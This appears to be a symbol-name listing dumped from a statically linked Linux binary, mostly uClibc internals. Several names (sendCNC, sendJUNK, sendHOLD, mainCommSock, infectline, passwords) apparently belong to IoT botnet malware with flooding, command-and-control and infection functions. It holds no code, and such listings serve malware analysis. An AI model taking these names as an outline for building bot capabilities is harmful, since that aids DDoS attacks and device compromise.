__GI_gethostbyname2
_edata
__stdout
__GI___close
__GI_memrchr
__GI_fflush_unlocked
__GI_isspace
__GI_strstr
__searchdomains
__GI_fstat
_end
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
__GI_connect
__curbrk
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
gethostbyname2
_dl_aux_init
sendJUNK
atoi
_stdio_openlist_del_lock
__GI_inet_aton
_custom_printf_handler
_setjmp
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__getdents64
__lll_lock_wait_private
strlen
lseek64
open
program_invocation_name
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__fork
__libc_sendto
__stdio_trans2w_o
__GI_vfork
__GI_config_read
strchr
__GI_rawmemchr
__GI_gethostbyname2_r
__GI_raise
__data_start
setsid
__GI_inet_addr
__GI_config_open
closedir
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
infectline
macAddress
__GI___libc_read
__GI___errno_location
strchrnul
readUntil
fcntl
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
__GI_config_close
__libc_connect
passwords
__GI_strlen
sendHOLD
mainCommSock
pids
sendCNC
vfprintf
__progname_full
strpbrk
getBogos
_load_inttype
__lll_unlock_wake_private
raise
free
__GI_strcspn
sigprocmask
getsockname
